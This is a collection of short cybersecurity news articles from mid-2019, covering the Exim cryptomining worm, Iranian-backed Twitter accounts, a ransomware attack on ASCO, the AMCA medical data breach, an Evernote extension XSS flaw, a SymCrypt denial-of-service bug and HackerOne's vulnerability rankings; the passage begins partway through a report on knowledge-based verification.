“The risk that an attacker could obtain and use an individual’s personal information to answer knowledge-based verification questions and impersonate that individual led the National Institute of Standards and Technology (NIST) to issue guidance in 2017 that effectively prohibits agencies from using knowledge-based verification for sensitive applications,” the report said.

In addition to cost, agencies noted additional challenges to implementation, which include “mobile device verification[, which] may not always be viable because not all applicants possess mobile devices that can be used to verify their identities. Nevertheless, until these agencies take steps to eliminate their use of knowledge-based verification, the individuals they serve will remain at increased risk of identity fraud,” the report stated.

Beyond recommending that the agencies discontinue the practice of knowledge-based verification, the GAO also recommended that the NIST augment its technical guidance to include implementation guidance and assist agencies in adopting more security authentication processes.

“It’s unfortunate that data breaches have become a part of our modern lives. But this report shows most of the damage isn’t done in the initial breach. In fact, most of the real damage comes from account takeovers by social engineering contact center agents long after the breach. Here’s the reality – hackers aren’t going away. The solution is to de-weaponize personal information. Stop relying on it for authentication,” said Pat Cox, VP and GM at Neustar.

“Identity interrogation and knowledge-based authentication, where citizens verify their identity by demonstrating knowledge of personal information, as basic as address or date of birth – information which could have been gleaned from dozens of recent data breaches – isn’t stopping identity theft."

Microsoft Urges Azure Customers to Patch Exim Worm

Microsoft Urges Azure Customers to Patch Exim Worm

Microsoft has urged Azure users to update their systems following the discovery of a major new attack campaign targeting popular email server software.

The worm, which Infosecurity reported on last week, targets mail transfer agent product Exim running on Linux-based email servers. It’s claimed that Exim is running on over half (57%) of the world’s email servers, with as many as 3.5 million vulnerable to the new attack.

In a security update on Friday, Microsoft confirmed that the attack imperils servers running Exim version 4.87 to 4.91. It said that although Azure has “controls” in place to prevent the spread of the worm, customers could still be vulnerable to infection and should update their systems as soon as possible.

“Customers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs. As this vulnerability is being actively exploited by worm activity, MSRC urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim,” Microsoft explained.

“There is a partial mitigation for affected systems that can filter or block network traffic via?Network Security Groups (NSGs). The affected systems can mitigate Internet-based ‘wormable’?malware or advanced malware threats that could exploit the vulnerability. However, affected systems are still vulnerable to Remote Code Execution?(RCE)?exploitation if the attacker’s IP Address is permitted through Network Security Groups?”

Two waves of attack have been spotted in the wild, downloading a cryptocurrency mining payload to monetize the threat. The more sophisticated of the two uses Tor services and creates “deceiving windows icon files” to throw security teams off the scent.

As well as downloading the payload, the malware searches for additional vulnerable servers on the internet, connects to them, and infects them with the initial script, according to Cybereason.

Twitter Shuts Down 5000 State-Sponsored Accounts

Twitter Shuts Down 5000 State-Sponsored Accounts

Twitter has taken down nearly 5000 fake accounts, most of them apparently backed by the Iranian state, in a bid to clean the platform of government-sponsored attempts to spread propaganda.

The social network claimed in a post last week that it had closed 4779 accounts linked to Tehran, 1666 of which tweeted nearly two million times, with content “that benefited the diplomatic and geostrategic views of the Iranian state.”

Another subset of 248 accounts were engaged with discussions related to Israel, while 2865 “employed a range of false personas to target conversations about political and social issues in Iran and globally.”

Four accounts were lined to the infamous Internet Research Agency (IRA), the Kremlin-linked organization responsible for a mass disinformation campaign on social media ahead of the 2016 US Presidential election.

Also removed by Twitter during this cull were 130 fake accounts linked to organizations including Esquerra Republicana de Catalunya, which spread content designed to “inorganically influence the conversation” about Catalan independence.

Twitter closed down a further 33 accounts run by a “commercial entity” operating in Venezuela “that were engaging in platform manipulation targeted outside of the country.”

“Our Site Integrity team is dedicated to identifying and investigating suspected platform manipulation on Twitter, including potential state-backed activity. In partnership with teams across the company, we employ a range of open-source and proprietary signals and tools to identify when attempted coordinated manipulation may be taking place, as well as the actors responsible for it,” wrote Twitter head of site integrity, Yoel Roth.

“We also partner closely with governments, law enforcement, and our peer companies to improve our understanding of the actors involved in information operations and develop a holistic strategy for addressing them.”

Europol Gamifies Cryptocurrency Crime Prevention

Europol Gamifies Cryptocurrency Crime Prevention

Europol trained its members on cryptocurrency-related crime at a conference last week, announcing the development of a new game.

The cross-jurisdictional law enforcement organization claimed that over 300 experts in cryptocurrency, from both the police and private sector, attended its headquarters in The Hague for the region’s largest conference of its kind last week.

The aim was to share best practice and look at new partnership-building opportunities to combat the growth in cybercrime linked to digital currencies, as well as techniques for recovering virtual assets stolen by hackers.

At the show, Europol announced the development of a new “cryptocurrency tracing game” developed in partnership with CENTRIC (Centre of Excellence in Terrorism, Resilience, Intelligence and Organised Crime Research).

Set to launch in October, the unnamed title will be the first “law enforcement training opportunity” to use gamification techniques to train officers on cryptocurrency and investigation.

“It will allow law enforcement officers to get hands-on training and advice on tracing cryptocurrencies in criminal investigations,” according to Europol.

The news comes as the popularity of illicit cryptocurrency mining appears to be waning among the cybercrime community – at least in terms of attacks on consumers.

Consumer detections of cryptojacking dropped to almost zero in Q1, thanks in part to the decision by Coinhive to shut down its operations, although attacks against businesses continue to rise, especially in APAC, Malwarebytes said last month.

Meanwhile, attacks on cryptocurrency firms continue unabated. Just last week, hackers made off with nearly $9.7m in virtual coins after a successful attack on digital wallet provider GateHub.

Among the experts at the Europol conference were representatives from: Binance, BitBay,, Bitfinex, BitFlyer Europe, Bitnovo, Bitonic, Bitpanda, BitPay, Bitstamp, CEX, Coinbase, Coinfloor, Coinhouse, Coinpayments, CoinsPaid, Ledger, Litebit, LocalBitcoins, OKCoin, Shapeshift, SpectroCoin, Tether and Xapo.

They shared best practices on implementing Know Your Customer (KYC) policies and risk-based approaches to suspicious transactions, according to Europol.

US Lawmakers Hear Testimony on Concerns of Deepfakes

US Lawmakers Hear Testimony on Concerns of Deepfakes

Days after a video of a transformed Arnold Swartzenegger went viral on YouTube, members of the US House Intelligence Committee heard testimony on Thursday, June 13, on raising concerns about the threat of  "deepfakes," according to The Hill.

In his opening remarks, committee chairman Adam Schiff said, “Advances in AI and machine learning have led to the emergence of advanced digitally doctored media, so-called ‘deepfakes’ that allow malicious actors to foment chaos, division or crisis....Of great concern is that deepfakes could have the power to disrupt the democratic process, particularly the presidential race of 2020.”

Schiff noted that three years ago, lawmakers feared that falsified documents could be used to meddle in elections. “Three years later, we are on the cusp of a technological revolution that could enable even more sinister forms of deception.”

Of paramount concern is that foreign actors could use these deepfakes to spew misinformation through malicious campaigns intended to deceive the public or sway public opinion. Throughout the course of the more-than-two-hour hearing, the committee saw convincing examples of deepfakes and examples of synthetic pictures of people that don’t exist at all.

Former FBI special agent and senior fellow for Alliance for Securing Democracy at the German Marshall Fund Clint Watts was part of a four-person panel that testified before the lawmakers of the potential for foreign adversaries to craft synthetic media capabilities that could be used against the US.

“The falsification of audio and video allows manipulators to dupe audience members in highly convincing ways, provoking emotional responses that can lead to widespread mistrust,” Watts warned.

It’s not only lawmakers that are worried about the potential threat of deepfakes. In a June 13 blog post, Neiman Labs looked at myriad ways that deepfakes could be used to manipulate the outcome of an election, noting that “deepfakes have the potential to wreak havoc in contexts such as news, where audio and video are treated as a form of evidence that something actually happened.

“So-called 'cheapfakes,' such as the widely circulated clip of House Speaker Nancy Pelosi, have already demonstrated the potential for low-tech manipulated video to find a ready audience. The more advanced technology creates a whole new level of speed, scale, and potential for personalization of such disinformation.”

Malware a Serious Threat for Industrial Orgs

Malware a Serious Threat for Industrial Orgs

During Q1 2019, Cryptolocker malware spiked to account for 24% of all malware used, up from only 9% in Q4 2018, according to a new report from Positive Technologies.

“This malware is often used in combination with phishing, with hackers constantly inventing new ways of deceiving users and making them pay a ransom. Healthcare has proved to be a favorite target of cryptolockers. Medical institutions are more likely to pay a ransom compared to other businesses, perhaps because of patients' lives and health being at stake,” the report stated.

“Phishing remains an effective way of delivering malware. But email is far from the only channel of malware distribution. For example, users frequently download files from torrent trackers, on which the risk of malware infection grows exponentially. Under the guise of a movie, attackers distributed malware used for spoofing addresses of bitcoin and Ethereum wallets when the information is copied from the clipboard. Users also often download programs from official app stores.”

Also up during Q1 was the number of unique threats, which exceeded the numbers from Q1 of last year by 11%. The report noted an increasing number of cases of infection using multifunctional Trojans, with attackers most often hitting government agencies (16%), medical institutions (10%) and industrial companies (10%).

“Malware combining multiple types of Trojans is becoming more and more widespread. Due to its flexible modular architecture, this malware can perform many different functions. For example, it can display advertising and steal user data at the same time,” the report said.

While Cryptolocker malware has risen, the percentage of hidden mining has decreased to 7% from the previously reported 9% in Q4 2018.

“Hackers have started to upgrade miners, turning them into multifunctional Trojans. Once inside a system with low computational power on which mining is uneconomical, such Trojans start acting as spyware and steal data,” the report said. According to the research, cyber-criminals are using self-developed spyware or hacking government websites to steal data from governments.

Canadian City Fell Prey to a $375K Phish

Canadian City Fell Prey to a $375K Phish

Yet another city has fallen victim to a "a complex phishing email." The scam cost Burlington, Ontario, Canada, C$503,000 – the equivalent of nearly US$375,000.

“On Thursday, May 23, the City of Burlington discovered it was a victim of fraud. A single transaction was made to a falsified bank account as a result of a complex phishing email to City staff requesting to change banking information for an established City vendor. The transaction was in the form of an electronic transfer of funds made to the vendor...and was processed on May 16," the city announced.

Burlington immediately contacted law enforcement and a criminal investigation is underway, according to the announcement.  

“Cyber-attacks are on the rise, and phishing emails that involve the human factor are responsible for a great number of these breaches. Organizations globally are realizing the need to invest in employee training and deploy different training solutions in hope to mitigate the risk of data breaches,” said Shlomi Gian, CEO at CybeReady.

“Instead of increasing spending and IT effort, organizations should opt for smart solutions that guarantee change in employee behavior. Effective training should not become an IT and financial burden. Increased awareness might be the only way to reduce the risk of another incident like this in the foreseeable future.”

According to Global News Canada, none of Burlington’s systems have been impacted by the transaction. At this time, the city is not providing any additional information, but experts advise that all organizations continue to invest in their human capital via security training and awareness.

“Humans remain the weakest link in any organization. Properly implemented security controls can reduce the risk of human error but not eliminate it. Worse, cyber-criminals will now purposely target smaller organizations that cannot afford to invest in their cybersecurity,” said Ilia Kolochenko, founder and CEO of web security company ImmuniWeb.

Home Secretary Signs Assange US Extradition Request

Home Secretary Signs Assange US Extradition Request

The UK home secretary Sajid Javid has approved an extradition request from the US for WikiLeaks founder Julian Assange to be extradited.

The Tory leadership hopeful told BBC Radio 4’s Today program on Thursday that the controversial figure is one step closer to a trial on US soil, where he faces an 18-count indictment.

“He’s rightly behind bars. There’s an extradition request from the US that is before the courts tomorrow but yesterday I signed the extradition order and certified it and that will be going in front of the courts tomorrow,” said Javid.

“It is a decision ultimately for the courts, but there is a very important part of it for the home secretary and I want to see justice done at all times and we’ve got a legitimate extradition request, so I’ve signed it, but the final decision is now with the courts.”

The Department of Justice initially indicted Assange on hacking offenses related to Chelsea Manning’s alleged unauthorized access of Pentagon computers to access classified information.

However, that was superseded by a new 18-count court order detailing charges related to Assange’s publishing of that classified info, which it is alleged harmed national security.

The trove of hundreds of thousands of secret diplomatic cables and other documents relating to US wars in Afghanistan and Iraq contained unredacted names of US informants and diplomats in those countries, allegedly putting their physical safety at risk.

However, press freedom advocates have warned that the charges could set a dangerous precedent, given that WikiLeaks was acting in the public interest in revealing US military cover-ups such as the accidental shooting of two Iraqis working for Reuters news agency in 2007.

It’s also claimed that as Assange is not a US citizen and his crimes were not committed on US soil, he should not be facing extradition.

Former editor of the Guardian, Alan Rusbridger, claimed the charges are “attempting to criminalize things journalists regularly do as they receive and publish true information given to them by sources or whistleblowers.”

However, Assange has also been a controversial figure: his decision to publish private emails hacked by alleged Russian state spies from Democratic Party officials is said to have given Donald Trump a key advantage in the 2016 race for the White House.  

Millions of Email Servers at Risk from Cryptomining Worm

Millions of Email Servers at Risk from Cryptomining Worm

Researchers have spotted a major new cyber-attack campaign targeting millions of Linux email servers around the world with a cryptomining malware payload.

Exim accounts for over half (57%) of the globe’s internet email servers. Over 3.5 million are at risk from a vulnerability discovered last week, CVE-2019-10149, according to security vendor Cybereason.

There appears to be two waves of attack: the first involved attackers initially pushing out exploits from a command and control (C2) server on the clear web. However, the second seems to be more sophisticated.

“This is a highly pervasive campaign that installs cron jobs for persistence and downloads several payloads for different stages of the attack. In one of those stages, one of the payloads is a port scanner written in python. It looks for additional vulnerable servers on the internet, connects to them, and infects them with the initial script,” wrote Cybereason.

“In the attack, the attackers add an RSA authentication key to the SSH server which allows them to connect to the server as root and own it completely.”

Researchers are still working to assess the breadth of the campaign, but with worm-like capabilities in play, system administrators are urged to patch their Exim servers now, as well as find and remove any cron jobs.

“It is clear that the attackers went to great lengths to try to hide the intentions of their newly-created worm. They used hidden services on the TOR network to host their payloads and created deceiving windows icon files in an attempt to throw off researchers and even system administrators who are looking at their logs,” concluded Cybereason. 

“The prevalence of vulnerable Exim servers allows attackers to compromise many servers in a relatively short period of time, as well as generate a nice stream of cryptocurrency revenue.”

MI5 Breached Surveillance Law for Years

MI5 Breached Surveillance Law for Years

MI5’s breaches of the law in its handling and retention of bulk surveillance data are much worse than first thought, according to new legal documents revealed as part of an ongoing case.

Rights group Liberty is challenging outgoing Prime Minister Theresa May’s flagship Snoopers’ Charter, aka the Investigatory Powers Act (IPA): a law which allows the security services to hack devices and intercept communications en masse, collecting and storing info on countless innocent citizens.

Last month it was revealed that MI5 had breached IPA safeguards, something home secretary Sajid Javid described as “compliance risks” that require “serious and required immediate mitigation.”

However, this week Liberty disclosed 10 further documents and letters from MI5 and watchdog the Investigatory Powers Commissioner (IPCO) detailing “undoubtedly unlawful” conduct from the security service for as long as the IPA has been in existence.

“Without seeking to be emotive, I consider that MI5’s use of warranted currently, in effect, in ‘special measures’ and the historical lack of compliance... is of such gravity that IPCO will need to be satisfied to a greater degree than usual that it is ‘fit for purpose',” the commissioner wrote in one.

MI5 failed to safeguard citizens’ privacy by, for example, destroying material in a timely manner or protecting legally privileged material, and knew about such “compliance gaps” for three years before telling the IPCO, according to Liberty.

MI5’s false assurances extended to its maintaining to senior judges that data handling obligations were being met, resulting in warrants for bulk surveillance being issued that otherwise would not have been forthcoming.

The new evidence also revealed that personal data collected by MI5 is being stored in “ungoverned spaces,” and that the intelligence service’s lawyers claim there is “a high likelihood [of it] being discovered when it should have been deleted, in a disclosure exercise leading to substantial legal or oversight failure.”

The government is now trying to minimize the fallout from more damaging revelations by applying for further details to be provided to the court through private hearings.

“These shocking revelations expose how MI5 has been illegally mishandling our data for years, storing it when they have no legal basis to do so. This could include our most deeply sensitive information – our calls and messages, our location data, our web browsing history,” argued Liberty lawyer, Megan Goulding.

“It is unacceptable that the public is only learning now about these serious breaches after the government has been forced into revealing them in the course of Liberty’s legal challenge. In addition to showing a flagrant disregard for our rights, MI5 has attempted to hide its mistakes by providing misinformation to the Investigatory Powers Commissioner, who oversees the government’s surveillance regime.”

Employees Out of Work after ASCO Hit by Ransomware

Employees Out of Work after ASCO Hit by Ransomware

Nearly 1,000 employees in ASCO’s Zaventem, Belgium, office have been left incapable of doing their jobs after a ransomware attack crippled the aircraft-parts manufacturer, according to a June 11 report from vrt NWS.

“From the ISF’s standpoint, everyone who has access to an organization’s information and systems should be made aware of the risks from ransomware and the actions required to minimize those risks,” said Steve Durbin, managing director of the Information Security Forum.

“The bottom line is that if you can’t do without the information and you don’t have a backup, then paying is the only option you have left to recapture your data. Therefore, prevention is the way to go to better protect yourself.”

ASCO temporarily shut down operations at its headquarters in Zaventem in the aftermath of the attack, as was reported by Data News.

Spirit AeroSystems acquired ASCO, a Belgian organization, in 2018. Spirit AeroSystems reportedly said that it would also temporarily cease production in other countries, according to a June 13 post from Tripwire.

“Initially, ASCO merely disclosed that someone had hacked its servers. It did not supply additional details at that time....As of this writing, it’s unclear what ransomware family was responsible for the infection or how it gained access to ASCO’s network,” Tripwire’s David Bisson wrote.

“This latest ransomware attack against a critical supplier of airplane parts is another reminder on how destructive ransomware continues to be to organizations,” said Joseph Carson, chief security scientist at Thycotic.

“Ransomware, however, should be a lower risk to businesses if they follow common industry best practices such as the introduction of a solid incident response plan, backup and recovery practice, cybersecurity awareness training and strong privilege and access management controls to limit administrator access.”

“Supply chains are difficult to secure. They create risk that is hard to identify, complicated to quantify and costly to address. A compromise anywhere in the supply chain can have just as much impact on your business, your bottom line, and your reputation, as one from within the organization."

Gaming’s All Fun and Games Till Someone Gets Hacked

Gaming's All Fun and Games Till Someone Gets Hacked

Cyber-criminals are playing games with the gaming industry according to two new reports published by Akamai and Kaspersky.  

The Akamai 2019 State of the Internet/Security Web Attacks and Gaming Abuse Report found that cyber-criminals have targeted the gaming industry by carrying out 12 billion credential-stuffing attacks against gaming websites, with a total of 55 billion credential-stuffing attacks across all industries within the 17-month period analyzed in the report (November 2017–March 2019).

SQL injection (SQLi) attacks account for 65% of all web application attacks, while local file inclusion (LFI) attacks only represent 24.7%, according to the report. As SQLi attacks have grown as an attack vector, the report found that the bridge between SQLi and credential-stuffing attacks is almost a direct line.

“One reason that we believe the gaming industry is an attractive target for hackers is because criminals can easily exchange in-game items for profit,” said Martin McKeay, security researcher at Akamai and editorial director of the State of the Internet/Security Report. “Furthermore, gamers are a niche demographic known for spending money, so their financial status is also a tempting target.”

In related news, research from Kaspersky confirmed that, unfortunately, more and more video games are being used to distribute malware to unsuspecting users. According to the research, more than 930,000 users were hit by malware attacks in the last 12 months, which cyber-criminals have achieved through crafting and distributing fake copies of popular video games, including "Minecraft," "Grand Theft Auto V" and "Sims 4."

Malware-disguised "Minecraft" accounted for around 30% of attacks, with over 310,000 users hit. Coming in at a distant second place was "Grand Theft Auto V," which targeted more than 112,000 users.

According to the researchers, criminals were also found trying to lure users into downloading malicious files pretending to be unreleased games. Spoofs of at least 10 pre-release games were seen, with 80% of detections focused on "FIFA 20," "Borderlands 3," and the "Elder Scrolls 6."

“For months now we see that criminals are exploiting entertainment to catch users by surprise – be it series of popular TV shows, premieres of top movies or popular video games,” said Maria Fedorova, security researcher at Kaspersky, in a press release.

“This is easy to explain: people can be less vigilant when they just want to relax and have fun. If they’re not expecting to find malware in something fun they’ve used for years, it won’t take an advanced-threat like infection vector to succeed. We urge everyone to stay alert, avoid untrusted digital platforms and suspicious-looking offers, install security software and perform a regular security scan of all devices used for gaming.”

AGs Warn ACMA Breach Impact Rose to over 20 Million

AGs Warn ACMA Breach Impact Rose to over 20 Million

After the data of more than 20 million patients was potentially exposed during the cyber-attack against American Medical Collection Agency (AMCA), the third-party collection agency for laboratories, hospitals, physician groups, medical providers and others, attorney generals (AGs) in such states as New Jersey, Illinois, Connecticut and Maryland have started alerting citizens and looking for answers to exactly what happened.

“The healthcare industry may be the most vulnerable of all industries to cyber-attacks. It's about the data healthcare operators have access to. In the AMCA cyber-heist, data stolen included patient PII [personally identifiable information] and lab test info but also included healthcare provider info, credit/debit card info, bank account info and social security numbers. This was a ‘treasure trove’ of data to a cyber-thief,” said Jonathan Deveaux, head of enterprise data protection at comforte AG.

The third-party data breach impacted both Quest Diagnostic and LabCorp, as well as BioReference Laboratories, CareCentrix and Sunrise Laboratories. According to LabCorp’s disclosure notice, “That information could include first and last name, date of birth, address, phone, date of service, provider, and balance information. AMCA’s affected system also included credit card or bank account information that was provided by the consumer to AMCA (for those who sought to pay their balance).”

Maryland AG Brian E. Frosh warned consumers to review their financial and medical records, according to WJZ-13. “Massive data breaches like the one experienced by the AMCA are extremely alarming, especially considering the likelihood that personal, financial, and medical information may now be in the hands of thieves and scammers,” Frosh told WJZ-13. “I strongly urge consumers to take steps to ensure that their information and personal identity is protected.”

Armed with this collection of patient data, criminals are in a good position to fraudulently collect money from those patients, according to Tim Erlin, VP, product management and strategy at Tripwire. “Imagine if you received an email with accurate details about a medical bill you actually have and a link to make a payment. It only takes a handful of people to fall for this scam in order for it to be worthwhile for the criminal.”

UK Orgs Lose 2 & 1/2 Months a Year on Poor Password Management

UK Orgs Lose 2 & 1/2 Months a Year on Poor Password Management

Businesses in the UK lose an average of two-and-a-half months per year in time spent dealing with poor password management, according to new research from OneLogin.

As detailed in its report Password Practices 2019, OneLogin surveyed 600 global IT professionals to gauge how companies are protecting passwords in terms of tools, guidelines and practices.

The key findings indicated that companies spend too much time resetting passwords that users have forgotten, believe they are dramatically safer than their password practices actually suggest and have failed to move quickly to adopt the tools that solve the password problem, like SSO, SAML, OAuth and MFA.

What's more, businesses are not heeding the latest password guidelines, Onelogin claimed, speci?cally regarding password rotation and checking passwords against lists of commonly-used passwords, compromised passwords and rainbow tables. Two thirds of those surveyed admitted they do not check passwords against common password lists and 78% do not check employee passwords against password complexity algorithms.

Thomas Pedersen, OneLogin’s chief technology officer and founder, said: “The benefits of innovative technology to facilitate modern business practices is clearly yet to be recognized by the average UK business overwhelmed by day-to-day password management processes. Trust must be built between businesses and B2B tech vendors, as a lot of businesses are stubbornly struggling in the dark and avoiding the topic of ‘digital transformation’ to free up employee and operational efficiencies.”

Pedersen urged businesses to streamline and simplify Identity and Access Management processes by implementing SSO and MFA tools.

“By doing so they will be freeing up skilled IT professionals to focus on tasks that drive greater business value and connect dispersed workforces. Organizations that don’t, may not survive the next two to five years. The quick adoption of automated tools is key to business survival.”

UK Orgs Lose 2.5 Months a Year on Poor Password Management

UK Orgs Lose 2.5 Months a Year on Poor Password Management

Businesses in the UK lose an average of two-and-a-half months per year in time spent dealing with poor password management, according to new research from OneLogin.

As detailed in its report Password Practices 2019, OneLogin surveyed 600 global IT professionals to gauge how companies are protecting passwords in terms of tools, guidelines and practices.

The key findings indicated that companies spend too much time resetting passwords that users have forgotten, believe they are dramatically safer than their password practices actually suggest and have failed to move quickly to adopt the tools that solve the password problem, like SSO, SAML, OAuth and MFA.

What's more, businesses are not heeding the latest password guidelines, Onelogin claimed, speci?cally regarding password rotation and checking passwords against lists of commonly-used passwords, compromised passwords and rainbow tables. Two thirds of those surveyed admitted they do not check passwords against common password lists and 78% do not check employee passwords against password complexity algorithms.

Thomas Pedersen, OneLogin’s chief technology officer and founder, said: “The benefits of innovative technology to facilitate modern business practices is clearly yet to be recognized by the average UK business overwhelmed by day-to-day password management processes. Trust must be built between businesses and B2B tech vendors, as a lot of businesses are stubbornly struggling in the dark and avoiding the topic of ‘digital transformation’ to free up employee and operational efficiencies.”

Pedersen urged businesses to streamline and simplify Identity and Access Management processes by implementing SSO and MFA tools.

“By doing so they will be freeing up skilled IT professionals to focus on tasks that drive greater business value and connect dispersed workforces. Organizations that don’t, may not survive the next two to five years. The quick adoption of automated tools is key to business survival.”

“Major Flaw” Discovered in Evernote’s Chrome Extension

“Major Flaw” Discovered in Evernote’s Chrome Extension

A major flaw has been discovered in the code of the Web Clipper Chrome extension of note-taking service Evernote.

The flaw, a universal XSS marked CVE-2019-12592 which could have allowed threat actors to extract personal information from the browser environment, was unearthed by security company Guardio and disclosed to Evernote in late May. Within a week, Evernote addressed the issue and rolled-out a complete fix.

According to Guardio: The logical coding error in the Web Clipper extension could have allowed an attacker to bypass the browser’s same origin policy, granting the attacker code execution privileges in Iframes beyond Evernote’s domain. As the browser’s domain-isolation mechanisms were broken, code could be executed that could allow an attacker to perform actions on behalf of the user as well as grant access to sensitive user information on affected third-party web pages and services, including authentication, financials, private conversations in social media, personal emails, and more.

Michael Vainshtein, CTO at Guardio, said: “The vulnerability we discovered is a testament to the importance of scrutinizing browser extensions with extra care. People need to be aware that even the most trusted extensions can contain a pathway for attackers. All it takes is a single unsafe extension to compromise anything you do or store online. The ripple effect is immediate and intense.”

The story highlights the importance of swift vulnerability disclosure, response and remediation, particularly given the fact that the flaw had the potential to affect any number of Evernote’s users (around 4,600,000 at the time of discovery).

KnowBe4 Gets Whopping $300m in Funding

KnowBe4 Gets Whopping $300m in Funding

A private equity giant has invested an additional $300 million in cybersecurity awareness firm KnowBe4 only three months after announcing its initial investment of $50 million, according to Fortune.

At the helm of the company, which provides integrated security awareness training and a simulated phishing platform, are Stu Sjouwerman, CEO, and Kevin Mitnick, chief hacking officer. Founded in 2010, the company now boasts more than 25,000 users across the globe from highly regulated industries to global organizations.

“The company helps organizations address the human element of security by raising awareness of ransomware, CEO fraud and other social engineering tactics through a new-school approach to security awareness training,” the June 12 press release said.

“Having secured additional funding, as well as 'unicorn' status as a private company valued at $1 billion, KnowBe4 now plans to continue an ambitious international expansion that, in 2019 alone, has seen it acquire two cybersecurity companies located in different parts of the globe: Brazil-based El Pescador and Norway-based CLTRe,” Fortune reported.

In response to the company earning unicorn status, KnowBe4 CEO Stu Sjouwerman lauded the relationship the company has built with its investment firm, KKR. Sjouwerman’s blog post emphasized his plentiful gratitude:

I'd like to thank you for your trust in us, and for telling your friends about our platform. This is only the beginning of building a strong human firewall and we still need all the help we can get.

So from the bottom of our hearts, thank you so much. We will continue doing our level best to help you keep your organization safe, and please keep spreading the word.

“Organizations are beginning to understand that when it comes to security, building a human firewall takes precedence over merely deploying technology,” Sjouwerman told Infosecurity. “This investment is a representation of what we're seeing in the market, which is more emphasis placed on the area of security awareness training and education as a key way to manage the ongoing problem of social engineering.”

Philly Courts Still Down after Cyber-Attack

Philly Courts Still Down after Cyber-Attack

After a May 21, 2019, cyber-attack downed Philadelphia’s online court system for e-filing and docketing services, issues remain throughout the county, according to Government Technology.

On June 11, Government Technology reported that the computer networks of the Luzerne County Correctional Facility in Pennsylvania continue to be impacted, leaving inmates unable to order items from the jail commissary.

“The First Judicial District and City OIT are working in concert to ensure the safety of the First Judicial District’s electronic web system following the discovery of malware on a limited number of FJD workstations. As a precautionary measure the FJD’s website, employee email accounts, and electronic filing (e-file) have been temporarily suspended,” a May 31 notice from the The Philadelphia Courts First Judicial District of Pennsylvania stated.

“We are currently unable to provide more information concerning this virus so as not to provide any detail-specific information that could jeopardize the remediation process we are engaged in. In addition to City OIT, the FJD is contracting the services of a firm specializing in cybersecurity to assist in getting impacted operations restored safely.”

Since then, the courts have been using social media to engage with members of the community. On June 10, the Philadelphia courts expressed appreciation for the community’s patience as employees work to meet filing needs.

The city has reportedly hired a cybersecurity firm to investigate the attack, though said firm has not been named.

“Declining to name a publicly funded contractor has raised eyebrows. So far, the court has described the unnamed vendor as a firm 'specializing in cyber security to assist in getting impacted operations restored safely.' Courts spokesperson Marty O’Rourke has declined repeated requests for the name of the vendor – as well as the amount the city is paying for these services,” Billy Penn’s Max Marin reported.

Flaw in SymCrypt Can Trigger DDoS

Flaw in SymCrypt Can Trigger DDoS

A vulnerability in the SymCrypt cryptographic library of Microsoft's OS can trigger a distributed denial-of-service (DDoS) disruption in Windows 8 servers and above, causing a perpetual operation "when calculating the modular inverse on specific bit patterns with bcryptprimitives!SymCryptFdefModInvGeneric," according to Tavis Ormandy, a Google researcher.

“I noticed a bug in SymCrypt, the core library that handles all crypto on Windows. It's a DoS, but this means basically anything that does crypto in Windows can be deadlocked (s/mime, authenticode, ipsec, iis, everything). Microsoft committed to fixing it in 90 days, then didn't,” Ormandy tweeted.

Now that we’ve entered into the 91st day, Ormandy has gone public with what he said is a relatively low severity bug. “I've been able to construct an X.509 certificate that triggers the bug. I've found that embedding the certificate in an S/MIME message, authenticode signature, schannel connection, and so on will effectively DoS any windows server (e.g., ipsec, iis, exchange, etc.) and (depending on the context) may require the machine to be rebooted. Obviously, lots of software that processes untrusted content (like antivirus) call these routines on untrusted data, and this will cause them to deadlock,” Ormandy wrote in the Project Zero vulnerability report.

Ormandy noted that while it is a low-severity bug, it would be possibly to take down an entire Windows fleet relatively quickly if exploited. Infosecurity reached out to Microsoft for comment, but the company has not responded.

"This finding demonstrates just how important this type of research is in helping organizations mitigate risks no one ever knew existed. The frightening part about this vulnerability and others that can be remedied with a simple patch, however, is that many organizations will have a very difficult time actually implementing the fix,” said Adam Laub, SVP product management, STEALTHbits Technologies.

“When I first started in the industry nearly 15 years ago, patch management was very much the flavor of the day – much like privileged access management (PAM) and artificial intelligence (AI) technologies command significant mind share among security practitioners now. Sadly, the patch management problem persists despite advances in so many other areas of IT management, which could make this 'low severity' vulnerability a lot more pungent than it ought to be."

XSS is Most Rewarding Bug Bounty as CSRF is Revived

XSS is Most Rewarding Bug Bounty as CSRF is Revived

Cross-site scripting (XSS) is the most rewarding security vulnerability, according to data on the number of bug bounties paid.

According to HackerOne’s top 10 most impactful security vulnerabilities, which have earned hackers over $54m in bounties and based on over 1400 HackerOne customer programs and 120,000 reported vulnerabilities, XSS is the most paid out vulnerability, followed by “improper authentication – generic” and “information disclosure.”
HackerOne’s Top 10 security vulnerabilities are:

  1. Cross-site Scripting - All Types (dom, reflected, stored, generic)
  2. Improper Authentication - Generic
  3. Information Disclosure
  4. Privilege Escalation
  5. SQL Injection
  6. Code Injection
  7. Server-Side Request Forgery (SSRF)
  8. Insecure Direct Object Reference (IDOR)
  9. Improper Access Control - Generic
  10. Cross-Site Request Forgery (CSRF)

In comparison to the current OWASP Top Ten, which was last refreshed in 2017, XSS only featured in seventh place in the last top 10. While SQL Injection, which was in the top position of the OWASP top 10, appeared in fifth place in HackerOne’s list.

Speaking to Infosecurity, Rahim Jina, COO of edgescan, said that from their stats XSS accounts for nearly 15% of application layer vulnerabilities found, showing a slight increase year on year.

“This is a vulnerability we nearly expect to find when we are assessing a web application (you tend to find multiple instances in an application, if you find them),” he said. “XSS has been around a long time and when highlighted, developers typically can resolve these, however we frequently see the same issues being introduced by these developers subsequently. I believe there is an educational problem here which needs to be addressed (people do get training, however they often seem to re-introduce XSS issues subsequently for whatever reason).”
Miju Han, director of product management at HackerOne, said: “We see a 40% crossover of the HackerOne Top 10 to the latest version of the OWASP Top 10. Both assets will be able to help security teams identify the top risks, our just also takes into account volume and bounty values, which we think will be of particular interest to security teams looking to protect against criminal hackers.”
Cross-Site Request Forgery, which was removed from the last OWASP Top 10, having appeared in seventh place in the 2013 OWASP Top 10, was the tenth most paid bug for HackerOne.

Jina said that CSRF “is an interesting one” as last year it accounted for 1.75% of total app-layer vulnerabilities as found by edgescan and the reason cited by many here is that most of the modern web app frameworks include CSRF defenses built-in which can be enabled easily.

“Scanners tend to report this issue with high frequency, however when you actually look at the issue, the transaction may not be relevant – CSRF is about abusing a transaction in some meaningful way,” he said.

“Finding it may be relatively easy, however validating the real issue takes some effort. Additionally, due to the often complex nature of actually abusing such an issue successfully, these are often presented as lower risk items.”

